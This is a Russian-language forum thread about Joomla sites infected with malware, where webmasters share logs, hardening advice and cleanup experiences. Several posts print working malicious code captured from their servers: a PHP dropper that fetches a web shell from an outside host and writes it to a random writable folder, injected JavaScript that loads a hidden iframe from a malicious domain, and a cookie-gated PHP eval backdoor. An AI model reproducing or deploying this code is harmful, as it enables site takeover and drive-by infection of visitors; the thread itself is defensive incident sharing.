Вирус на сайте, редирект, что делать как лечить! - страница 11 - Безопасность сайтов на Joomla

Сегодня в логах обнаружил несколько штук такой вещи:
При вводе в адресную строку этой беды, типа http://мой_сайт/index.php?link=aHR0.. и т.д.
на экране появлятеся форма:
Я добросовсетно её заполнил (введя свои адреса) и мне свалилось письмо:
и далее по ссылке открывается одна из обычных страничек сайта.
Это как надо понимать, кто может объяснить сей момент?  Что робот от майл.ру юзает мой smtp-почтовик и кому-то (самому себе??) шлёт "рекламу" от имени моего сайта?? Я в непонятках.. ((( 

Это как надо понимать, кто может объяснить сей момент?  Что робот от майл.ру юзает мой smtp-почтовик и кому-то (самому себе??) шлёт "рекламу" от имени моего сайта?? Я в непонятках.. ((( 

Робот майл.ру ничего не юзает и не шлет, как любой робот бродит по всему сайту и тыкается в любые доступные закоулки, так как в майл.ру с некоторого времени начали продвигать свой поисковик, то ничего удивительного в такой дотошности нет. Кто учится того покидают непонятки, а кто не учится тот обречен всю жизнь прожить с непонятками. 

Робот майл.ру ничего не юзает и не шлет, как любой робот бродит по всему сайту и тыкается в любые доступные закоулки

Ок. Тогда можно намекнуть - в чём смысл формирования таких ссылок - почтовых форм??

dormidont
Версия Joomla? Авторизация SMTP включена?
Установлен jHackGuard ?

Проверил айболитом два своих сайта и на обоих в каждой директории компонента ninjarsssyndicator лежит папка .svn (именно с точкой в начале). В этих папках лежат:
- файл entries - папка text-base, в которой 2 файла index.html.svn-base и picker.html.svn-base.
Индексный файл - обычная пустышка, а вот код picker-а (судя по всему, какая-то пипетка:
Это вирус или нет? Надо его удалять?

Сегдня два сайта чистил
иньекция [28/Apr/2013:07:10:59 +0400] "POST /images/jos_wjy4.php  с 93.189.43.70 (93.189.43.**)
Вот понять бы через что залезли.
В логе с 17 апреля подобные строки пошли
"GET /administrator/ HTTP/1.1" 200 6989 "-" "esLQOJJ5FZWvlE e" 16464 12
"POST /administrator/ HTTP/1.1" 200 7292 "-" "esLQOJJ5FZWvlE e" 16464 3

Тыц...


нонумбер фреймворк 11

могу правда что-то путать.

Тыц...

Спойлер

[свернуть]

нонумбер фреймворк 11

могу правда что-то путать.

Чот не помогло от *214afaae*
Все обновил, через 1 час все равно опять появилось...

Апдейт: хотя не уверен, на других сайатах на этом же аккаунте тоже самое и я там не обновлял. Сейчас отключу все сайты оставлю только 2 где все обновлю, ноунамбер этот.

Ну неплохо бы еще и вылечить сайт от уже занесенного. Кроме того, под одним пользователем все сайты очень хорошо заражаются.

Привет Всем желающим обезопасить свои Joomla-сайты.  

Хочу поделиться очень интересной настройкой для VDS/VPS или Deicated -серверов, к которым у вас есть ROOT-доступ.
Данная инструкция работает для ОС FreeBSD после её выполнения JS-файлы нельзя заразить на сервере от имени владельца сайта.

Это работает при условии, что под каждый сайт у вас создан отдельный пользователь на сервере.

Вот процедура:
1) ставим на все файлы в Joomla права доступа "644",
2) ставим владельцем ROOT на все JS-файлы для конкретного сайта

Объясню как работать с этой командой.
- подключаетесь к серверу по SSH (для этого можно использовать windows-клиент PuTTy)
- в PuTTy Вводите ip-адрес вашего сервера, имя пользователя ROOT, и пароль рута. Подключаетесь к shell сервера.
- /path/ - вписываем полный путь до директории сайта
- name_of_sitegroup - имя группы пользователя для конкретного сайта на сервере (менять её не обязательно, поэтому не будем писать группу пользователя в команду)

Пример (в данном примере имя группы пользователя совпадает с именем адреса mysite.ru):

Результат:
Файлы JS с правами 644 и владельцем ROOT обладают следующими преимуществами перед атакой:
- Нельзя изменить права файлам JS от имени пользователя mysite.ru (т.е. даже если на сайт закинули php-backdoor)
- Нельзя изменить содержимое JS-файлов (т.е. дописать туда iframe низя )) что мы и хотели)  
- можно удалить файл и переименовать его.

P.S. (будьте осторожны работая под ROOT-пользователем, все описанные действия вы выполняете на свой страх и риск)
P.P.S. У меня данный вариант сработал на сервере для нескольких сайтов одинаково хорошо  

вариант для vps/vds вопрос только что у многих шарада,
конечно он отработает как и отрабатывает если даже vps но криво настроенный так что у пользователя не один сайт, или встречали настройки на одного пользователя все сайты вешаются
но это как вариант не дать записать в js файл, но это только после того как взломали, сначало ломают потом скрипт пишет в файлы
как вариант начнут по старинке писать php, ну, а если их под рута засунуть то проблема будет обновить либо что то из расширений работать не будет
вариант хорош со своими плюсами и минусами, но применим для проведения работ по чистке, это если на хосте выполняется вся работа

проблема будет обновить либо что то из расширений работать не будет

Точно, надо проверить. Не подумал об этом. Спасибо. 
Вопрос остался не проверенным: будет ли обновляться сама Joomla и его компоненты.
По логике вещей это не должно повлиять. Да и JS-файлы редко меняются, чаще всего правят PHP при обновлении.

Проверю при следующем обновлении и отпишусь как сработало.

В остальном, даже если php-backdoor забросили, то изменить от Root'a уже JS-файлы не смогут.
А значит сайт не выпадет из выдачи в поисковиках и не заразит пользователей. (это наипервейшее - не упасть в выдаче поисковиков)

конечно он отработает как и отрабатывает если даже vps но криво настроенный так что у пользователя не один сайт

Так это как раз решение для "root-хостинга" где несколько сайтов с разделёнными пользователями, и ROOT - отдельно от всего.
Как говорится "не клади яйца в одну корзину". 

По сути это спасение только от рядя определённых атак направленных только лишь на заражение JS-файлов.

вот из сегодняшних логов:
27.54.91.90 - - [05/May/2013:06:23:21 +0400] "POST /components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=z.htm HTTP/1.0" 404 3033 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9"
198.245.63.133 - - [03/May/2013:16:47:48 +0400] "POST /logs/trackback/ HTTP/1.0" 302 229 "http://moysait.ru/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler)"
Если кому интересно
я в таких случаях баню IP  да и всю подсеть заодно от греха

иногда смотрю есть попытки захода в битрикс-админку!!))) т.е. у нас еще не все так плохо? чо там битриксоводы, втихую каждый сам за себя?)))

Че то сомнительно давать права root запускаемым скриптам Joomla.
При установке расширения на сайт Joomla, на VPS , права на файлы расширения устанавливается пользователя root. Меняю на права пользователя сайта Joomla.

Так это как раз решение для "root-хостинга" где несколько сайтов с разделёнными пользователями, и ROOT - отдельно от всего.
Как говорится "не клади яйца в одну корзину".  Smiley

По сути это спасение только от рядя определённых атак направленных только лишь на заражение JS-файлов.

это не отражение атак это устранение одной из проблем, как писал выше поясню, если не возможно js файлы инфицировать то тогда сделают это с php файлами, а shell все равно зальют потому что права только на файлы js изменены, ну а залив shell можно делать все что угодно с другими файлами
повторю
вариант этот подходит на время чистки, чтоб если проводить работы на хосте не думать что кто то что то изменит в этих файлах, но самое основное что многие сначала устраняют дыры, и у кого мозг работает тот заливает просто файлы js поверх и не парится с тем что бы, что то в них искать и менять при помощи ПО и скриптов, залить сверху проще, а этот вариант будет помехой

на счет того что их не изменят и ПС не наложит ярлык, объясню как он наложит так и снимет, с хороших сайтов снимает в течении 24 часов и позиции сайт не теряет, да он и с ярлыком не теряет, разве адвордс или директ не будет показы делать да и то через час после чистки начнет ни чего страшного

для всех кто не знает, это рекламные уловки многих чистильщиков, и паника тех кто не знает эту область работ, не одна ПС вас за это не забанит и не попадет сайт под фильтр, просто появится ярлык "сайт может угрожать вашему ПК" ну и антивирус ругаться будет, позиции сайт не теряет

рекомендация простая во время проведения работ по чистке, и при появлении вирусов, отключайте сайт ставьте вывод 403, что означает работы на сервере и все

конечно это рекомендация не является тем что надо отключить сайт на неделю)) месяц, и не забудьте потом 403 убрать, а то её по разному можно включить и потом забыть про неё

Че то сомнительно давать права root запускаемым скриптам Joomla.

они работать будут но обновить заменить файл не даст пользователю, но думаю не стоит им доверять доступ root

при находке файла с shell  обычно чищу содержимое забиваю внутрь редирект к дяде Билу и меняю права. скажете - садизм, но помогает!

при находке файла с shell  обычно чищу содержимое забиваю внутрь редирект к дяде Билу и меняю права. скажете - садизм, но помогает!

 

после находки файла с shell советую прочесать сайт на наличие файлов с длинной файла shell, бывает выдергиваешь еще пару   

Не люблю писать на форумах, но может инфа покажется кому полезной. Тоже один из сайтов (старая версия Joomla, очень старая) на нашем сервере подцепил гадость. Долго в логах искал shell, нашел. На нашем сервере стоит логгирование всех POST-запросов. Этот лог разрастается довольно быстро, но оно того стоит. Вот таким образом он заливался (спойлеры какие-то маленькие здесь, поэтому не прячу):

==c5a2aa6b==============================
Request: поддомен.домен.ru 37.1.193.89 - - [04/Feb/2013:01:21:22 +0400] "POST /index.php HTTP/1.1" 200 20212 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2" - "-"
----------------------------------------
POST /index.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Host: поддомен.домен.ru
Accept: */*
Content-Length: 2376
Expect: 100-continue
Content-Type: multipart/form-data; boundary=----------------------------b10b744a65c5

2376
------------------------------b10b744a65c5
Content-Disposition: form-data; name="p"

1fa2db09
------------------------------b10b744a65c5
Content-Disposition: form-data; name="c"


            $url = "http://alexvandeep.com/get.php?i=2&w=1&h=bae485f4d93b1bb8579e8ec579e1b90d";      
            if(ini_get("allow_url_fopen") == 1){
            $shellcontents = file_get_contents($url);
            } elseif(function_exists("curl_init")) {
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_HEADER, FALSE);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
            $shellcontents = curl_exec($ch);
            curl_close($ch);
            } else {
            die("SHELL_DONNO_HOW_TO_DOWNLOAD");
            }
            if(empty($shellcontents))
            die("SHELL_DOWNLOAD_ERROR");
            function findlow()
            {
            $dtmp = array_diff(scandir($_SERVER["DOCUMENT_ROOT"]), Array( ".", ".." ));
            $dlst = Array(); $adir = Array(); $wdir = Array();    $maxds = 0;
            foreach($dtmp as $d)
            if(is_dir($_SERVER["DOCUMENT_ROOT"]."/".$d)) $dlst[] = $d;
            function recursive($bdir) {    
            $dirs = array_diff(scandir($bdir), Array( ".", ".." ));
            $darr = Array();
            foreach($dirs as $d) { if(is_dir($bdir."/".$d)) { if( is_writable($bdir."/".$d) == 1) $darr[] = $bdir."/".$d;recursive($bdir."/".$d);} }
            return $darr;
            }
            $random_path = $_SERVER["DOCUMENT_ROOT"]."/".$dlst[rand(0, count($dlst)-1)]; $adir = recursive($random_path);
            foreach($adir as $low)    if($maxds < substr_count($low, "/"))    $maxds = substr_count($low, "/");
            foreach($adir as $low)    if(substr_count($low, "/") == $maxds) $wdir[] = $low;
            if (count($wdir) > 0) { return $wdir[rand(0,count($wdir)-1)]; } else { return $random_path; }
            }
            $shelldir = findlow();
            $shellname = substr(md5(rand(0,1000)), 0, rand(6, 8)).".php";
            if(file_put_contents($shelldir."/".$shellname, $shellcontents) === FALSE)
            die("SHELL_FILE_WRITE_ERROR");
            echo "SHELL_URL?http://".$_SERVER["HTTP_HOST"].str_replace($_SERVER["DOCUMENT_ROOT"], "", $shelldir)."/".$shellname."?";
------------------------------b10b744a65c5--


HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.6
Set-Cookie: 03d4f4e109779714d29e30e7c5c8bc4c=me9mu1qdgc5mbra0t1ohr0c8m2; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 03 Feb 2013 21:21:21 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
--c5a2aa6b--

Чуть позже вижу были заходы на залитый шелл. Немного позднее выложу код, который заливался через шелл (закодирован в base64_encode).
Потом с этого IP (37.1.193.89) к концу месяца на соседнем сайте пытались POST-ом авторизоваться, подбирая пароль от двух учеток (существующих, кстати, на сайте) по словарю, в течение 6 минут (перебрал несколько сотен паролей, но не подобрал, т.к. пароли вида k3hfH345h7K).

так непонятно через какую дырку это происходит

так непонятно через какую дырку это происходит

читаем внимательно все уже везде описано, или думаете у ваши сайты исключения

читаем внимательно все уже везде описано, или думаете у ваши сайты исключения

Значит не всё и, тем более, не везде. Не нужно забывать про "снаряд-броня"

Угроз не обнаружено, какие будут советы?

А как вы выискиваете эти угрозы? может программой или онлайн сервисом? Как на моем сайте просмотреть количество угроз?

Приветствую братья по оружию. Столкнулся с проблемой: наш "любимый Яндекс" добавил мой сайт с список зараженных. Самое обидное, что произошло все в праздники. Сайт коммерческий, делал сам для себя. Изменааааа ! Чего делать непонятно. Куда звонить, куда бежать. Судорожно начал писать хостеру, в Яндекс . Сами понимаете, всем по барабану. Надо отдать должное Яндекс, оперативно ответили и код выслали.

Здравствуйте, Сергей!

При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил в .js-скриптах вредоносный код следующего содержания:

/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset))!== -1) {
return index;
}
return false;
}
function papirosa(){
var denyList = ['Chrome'];
var denyUA = false;
for (var i in denyList) {
if (stripos(navigator.userAgent, denyList)) {
denyUA = true;
break;
}
}
return denyUA;
}
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!papirosa()) {
var cookie = getCookie('b19ad018sc');
if (cookie == undefined) {
setCookie('b19ad018sc', true, 292200);  
document.write('<iframe height="117" style="position:absolute;left:-1000px;top:-1000px;" width="117" src="http://volumessequencers.ru/yw46.REfcXpBZ?default"></iframe>');
}
};
})();/*eaa795220*

Пожалуйста, проверьте Ваши файлы и удалите вредоносный код. Вскоре после этого антивирус перепроверит сайт и, если опасное содержимое более не будет обнаружено, пометка в выдаче снимется.

Победил енту гадость следующим способом:

1.Стал смотреть структуру папок и нашел почти в каждой, файлы типа 12qwe22.php , ff2600.php и т.д. выяснил, что все они были изменены в одно время.
2.Открыл в Notepad++ и увидел, что они все одинаковые, вот что там было

<?php echo "#!!#";

3.Решил удалять ручками, но после 1-го часа понял, что сойду с ума  !
4.Нашел такую тулзу: FAR , очень удобно, выбирает только те файлы в которых есть только это сочетание. ( было около 1300 таких файлов )
5.Стал смотреть дальше, увидел схожие файлы : gg4409gg.php и т.д. , но дата была месяцем раньше, вот такая бяка там была :

<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}
?>

6.Проделал пункт №4 , их оказалось чуть меньше ( около 70 )
7.Стал дальше копаться и мне не понравился один файл ( странный он какой-то ) - jos_9hpq.php , решил скачать с сервака и посмотреть в Notepad++ что за зверь такой. И БИНГО ! Nod32 завизжал, как резаный.
8.Удалил и отправил к ним Пусть изучают !
9.Потом конечно очень на это чудо посмотреь, хотел проверить dr.web он-лайн, не дал его просканировать. Какая-то защита.
10.И вуаля, Яндекс сказал все в порядке. Пьем уже пиво, а не корвалол.

Надеюсь мой опыт кому-нибудь поможет.

....
Надеюсь мой опыт кому-нибудь поможет.

идентичная ситуация. Только как Вы с помощью FAR удаляли эти файлы? и в какой папке Вы нашли jos_9hpq.php ?

идентичная ситуация. Только как Вы с помощью FAR удаляли эти файлы? и в какой папке Вы нашли jos_9hpq.php ?

http://secu.ru/scripts/find-and-replace - ссылка на скрипт с инструкциями.

По моему в папке administrator или в корне, не помню если честно.

http://secu.ru/scripts/find-and-replace - ссылка на скрипт с инструкциями.

По моему в папке administrator или в корне, не помню если честно.

В любой папке может быть. У меня в images. Искать нужно по коду

идентичная ситуация. Только как Вы с помощью FAR удаляли эти файлы? и в какой папке Вы нашли jos_9hpq.php ?

Если хочешь могу глянуть

Привет.
Сегодня нашел /images/j.php:
Явно это гадость.
Я не силен в php, прокомментируйте, пжста, этот код.